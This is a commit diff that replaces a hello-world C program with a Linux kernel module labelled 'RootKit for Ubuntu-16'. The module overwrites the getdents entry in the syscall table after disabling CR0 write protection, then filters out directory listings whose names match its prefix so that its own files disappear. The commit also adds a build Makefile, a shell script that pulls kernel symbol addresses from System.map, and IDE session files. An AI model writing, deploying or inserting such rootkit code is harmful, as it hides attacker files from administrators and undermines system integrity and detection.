Ordner / Dateien verstecken hinzugefügt

.anjuta/.anjuta/session/anjuta.session

@@ -0,0 +1,8 @@
+[Anjuta]
+Geometry=1916x1040+0+38
+
+[Execution]
+Run in terminal=2
+
+[Document Manager]
+bookmarks=<?xml version="1.0" encoding="UTF-8"?>\n<bookmarks/>\n

.anjuta/session/anjuta.session

@@ -0,0 +1,20 @@
+[Anjuta]
+Geometry=1916x1040+0+38
+
+[File Loader]
+Files=../../Makefile#7%%%../../README.md#1%%%../../8008135.c#8
+
+[Document Manager]
+bookmarks=<?xml version="1.0" encoding="UTF-8"?>\n<bookmarks/>\n
+
+[Execution]
+Run in terminal=2
+Working directories=../../.
+
+[Build]
+Configuration list=1:Default:%%%1:Debug:Debug%%%1:Profiling:Profiling%%%1:Optimized:Optimized
+Selected Configuration=Default
+BuildArgs/Default=--enable-maintainer-mode
+BuildArgs/Debug=--enable-maintainer-mode 'CFLAGS=-g -O0' 'CXXFLAGS=-g -O0' 'JFLAGS=-g -O0' 'FFLAGS=-g -O0'
+BuildArgs/Profiling=--enable-maintainer-mode 'CFLAGS=-g -pg' 'CXXFLAGS=-g -pg' 'JFLAGS=-g -pg' 'FFLAGS=-g -pg'
+BuildArgs/Optimized=--enable-maintainer-mode 'CFLAGS=-O2' 'CXXFLAGS=-O2' 'JFLAGS=-O2' 'FFLAGS=-O2'

.anjuta/session/dock-layout.xml

@@ -0,0 +1,47 @@
+<?xml version="1.0"?>
+<dock-layout>
+  <layout name="__default__">
+    <dock name="__dock_1" floating="no" width="-1" height="-1" floatx="0" floaty="0" skip-taskbar="yes">
+      <paned orientation="vertical" resize="yes" locked="no" iconified="no" closed="no" position="326">
+        <paned orientation="horizontal" resize="yes" locked="no" iconified="no" closed="no" position="357">
+          <notebook orientation="vertical" resize="yes" locked="no" iconified="no" closed="no" page="0">
+            <item name="AnjutaFileManager" orientation="vertical" resize="yes" locked="no" iconified="no" closed="no"/>
+            <item name="AnjutaProjectManager" orientation="vertical" resize="yes" locked="no" iconified="no" closed="no"/>
+            <item name="AnjutaSymbolBrowser" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+            <item name="AnjutaSymbolDB" orientation="vertical" resize="yes" locked="no" iconified="no" closed="yes"/>
+            <item name="AnjutaDevhelpIndex" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+            <item name="AnjutaGladeTree" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+            <item name="AnjutaGladePalette" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+            <item name="AnjutaDebuggerRegisters" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+            <item name="snippets_browser" orientation="vertical" resize="yes" locked="no" iconified="no" closed="yes"/>
+          </notebook>
+          <paned orientation="horizontal" resize="yes" locked="no" iconified="no" closed="no" position="500">
+            <paned orientation="vertical" resize="yes" locked="no" iconified="no" closed="no" position="200">
+              <notebook orientation="vertical" resize="yes" locked="no" iconified="no" closed="yes" page="-1"/>
+              <notebook orientation="vertical" resize="yes" locked="no" iconified="no" closed="no" page="1">
+                <item name="AnjutaStarter" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+                <item name="AnjutaDocumentManager" orientation="vertical" resize="yes" locked="no" iconified="no" closed="no"/>
+                <item name="AnjutaDevhelpDisplay" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+                <item name="AnjutaTodoPlugin" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+                <item name="AnjutaClassInheritance" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+                <item name="AnjutaSamplePlugin" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+                <item name="AnjutaGladeEditor" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+                <item name="AnjutaDebuggerMemory" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+                <item name="AnjutaSubversionLogViewer" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+              </notebook>
+            </paned>
+            <notebook orientation="vertical" resize="yes" locked="no" iconified="no" closed="yes" page="-1"/>
+          </paned>
+        </paned>
+        <notebook orientation="vertical" resize="yes" locked="no" iconified="no" closed="yes" page="-1">
+          <item name="AnjutaTerminal" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+          <item name="AnjutaDebuggerStack" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+          <item name="AnjutaDebuggerLocals" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+          <item name="AnjutaDebuggerWatch" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+          <item name="AnjutaDebuggerBreakpoints" orientation="horizontal" resize="yes" locked="no" iconified="no" closed="yes"/>
+          <item name="AnjutaMessageView" orientation="vertical" resize="yes" locked="no" iconified="no" closed="yes"/>
+        </notebook>
+      </paned>
+    </dock>
+  </layout>
+</dock-layout>

8008135.c

@@ -1,26 +1,92 @@
-/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
-/*
- * main.c
- * Copyright (C) 2019 
- * 
- * 8008135 is free software: you can redistribute it and/or modify it
- * under the terms of the GNU General Public License as published by the
- * Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- * 
- * 8008135 is distributed in the hope that it will be useful, but
- * WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
- * See the GNU General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along
- * with this program.  If not, see <http://www.gnu.org/licenses/>.
- */
-
-#include <stdio.h>
-int main()
-{
-	printf("Hello world\n");
-	return (0);
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/kallsyms.h>
+#include <asm/special_insns.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include "sysgen.h"
+
+#define GETDENTS_SYSCALL_NUM	78
+#define WRITE_PROTECT_FLAG		(1<<16)
+#define HIDE_PREFIX				"8008135."
+#define HIDE_PREFIX_SZ			(sizeof(HIDE_PREFIX)-1) 
+#define MODULE_NAME				"8008135"
+#define MODULE_NAME_SZ			(sizeof(MODULE_NAME) - 1)
+
+
+
+struct linux_dirent {
+	unsigned long	d_ino;
+	unsigned long	d_off;
+	unsigned short	d_reclen; // d_reclen is the way to tell the length of this entry
+	char		d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
+};
+
+MODULE_AUTHOR("JKE");
+MODULE_LICENSE("GPL v2");
+MODULE_DESCRIPTION("RootKit for Ubuntu-16");
+
+typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count);
+sys_getdents_t sys_getdents_orig = NULL;
+
+// our new getdents handler
+asmlinkage long sys_getdents_new(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count) {
+	int boff;
+	struct linux_dirent* ent;
+	long ret = sys_getdents_orig(fd, dirent, count);
+	char* dbuf;
+	if (ret <= 0) {
+		return ret;
+	}
+	dbuf = (char*)dirent;
+	// go through the entries, looking for one that has our prefix
+	for (boff = 0; boff < ret;) {
+		ent = (struct linux_dirent*)(dbuf + boff);
+
+		if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) // if it has the hide prefix
+			|| (strstr(ent->d_name, MODULE_NAME) != NULL)) {     // or if it has the module name anywhere in it
+			// remove this entry by copying everything after it forward
+			memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen));
+			// and adjust the length reported
+			ret -= ent->d_reclen;
+		} else {
+			// on to the next entry
+			boff += ent->d_reclen;
+		}
+	}
+	return ret;
+}
+
+static int __init lkm_example_init(void) {
+	printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
+	
+	// record the original getdents handler
+	sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM];
+	
+	printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig);
+
+	// turn write protect off
+	write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
+	
+	// add our new handlers
+	sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
+
+	// turn write protect back on
+	write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
+
+	printk(KERN_INFO "New syscall in place\n");
+	
+	return 0;
+}
+static void __exit lkm_example_exit(void) {
+	// allow us to write to read onlu pages
+	write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
+	// set getdents handler back
+	sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
+	// turn write protect back on
+	write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
+	printk(KERN_INFO "Old syscall back\n");
 }
 
+module_init(lkm_example_init);
+module_exit(lkm_example_exit);

8008135.c~

@@ -0,0 +1,95 @@
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/kallsyms.h>
+#include <asm/special_insns.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include "sysgen.h"
+
+#define GETDENTS_SYSCALL_NUM	78
+#define WRITE_PROTECT_FLAG		(1<<16)
+#define HIDE_PREFIX				"8008135."
+#define HIDE_PREFIX_SZ			(sizeof(HIDE_PREFIX)-1) 
+#define MODULE_NAME				"8008135"
+#define MODULE_NAME_SZ			(sizeof(MODULE_NAME) - 1)
+
+
+
+struct linux_dirent {
+	unsigned long	d_ino;
+	unsigned long	d_off;
+	unsigned short	d_reclen; // d_reclen is the way to tell the length of this entry
+	char		d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
+};
+
+MODULE_AUTHOR("JKE");
+MODULE_LICENSE("GPL v2");
+MODULE_DESCRIPTION("RootKit for Ubuntu-16");
+
+typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count);
+sys_getdents_t sys_getdents_orig = NULL;
+
+// our new getdents handler
+asmlinkage long sys_getdents_new(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count) {
+	int boff;
+	struct linux_dirent* ent;
+	long ret = sys_getdents_orig(fd, dirent, count);
+	char* dbuf;
+	if (ret <= 0) {
+		return ret;
+	}
+	dbuf = (char*)dirent;
+	// go through the entries, looking for one that has our prefix
+	for (boff = 0; boff < ret;) {
+		ent = (struct linux_dirent*)(dbuf + boff);
+
+		if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) // if it has the hide prefix
+			|| (strstr(ent->d_name, MODULE_NAME) != NULL)) {     // or if it has the module name anywhere in it
+			// remove this entry by copying everything after it forward
+			memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen));
+			// and adjust the length reported
+			ret -= ent->d_reclen;
+		} else {
+			// on to the next entry
+			boff += ent->d_reclen;
+		}
+	}
+	return ret;
+}
+
+static int __init lkm_example_init(void) {
+	printk(KERN_INFO "Hello, World!\n");
+	
+	printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
+	
+	// record the original getdents handler
+	sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM];
+	
+	printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig);
+
+	// turn write protect off
+	write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
+	
+	// add our new handlers
+	sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
+
+	// turn write protect back on
+	write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
+
+	printk(KERN_INFO "New syscall in place\n");
+	
+	return 0;
+}
+static void __exit lkm_example_exit(void) {
+ 	printk(KERN_INFO "Goodbye, World!\n");
+	// allow us to write to read onlu pages
+	write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
+	// set getdents handler back
+	sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
+	// turn write protect back on
+	write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
+	printk(KERN_INFO "Old syscall back\n");
+}
+
+module_init(lkm_example_init);
+module_exit(lkm_example_exit);

Makefile

@@ -1,30 +1,6 @@
-
-## Created by Anjuta
-
-CC = gcc
-CFLAGS = -g -Wall
-OBJECTS = 8008135.o
-INCFLAGS = 
-LDFLAGS = -Wl,-rpath,/usr/local/lib
-LIBS = 
-
-all: 8008135
-
-8008135: $(OBJECTS)
-	$(CC) -o 8008135 $(OBJECTS) $(LDFLAGS) $(LIBS)
-
-.SUFFIXES:
-.SUFFIXES:	.c .cc .C .cpp .o
-
-.c.o :
-	$(CC) -o $@ -c $(CFLAGS) $< $(INCFLAGS)
-
-count:
-	wc *.c *.cc *.C *.cpp *.h *.hpp
-
+obj-m += 8008135.o
+modules: 
+		make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
 clean:
-	rm -f *.o
+		make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
 
-.PHONY: all
-.PHONY: count
-.PHONY: clean

create_sysgen.sh

@@ -0,0 +1,14 @@
+#!/bin/bash
+smap="/boot/System.map-$(uname -r)"
+
+echo -e "#pragma once" > ./sysgen.h
+echo -e "#include <linux/fs.h>" >> ./sysgen.h
+
+symbline=$(cat $smap | grep '\Wsys_call_table$')
+set $symbline
+echo -e "void** sys_call_table = (void**)0x$1;" >> ./sysgen.h
+
+procline=$(cat $smap | grep '\Wproc_modules_operations$')
+set $procline
+
+echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> ./sysgen.h

gitignore

@@ -0,0 +1,3 @@
+/.anjuta/
+/.anjuta_sym_db.db
+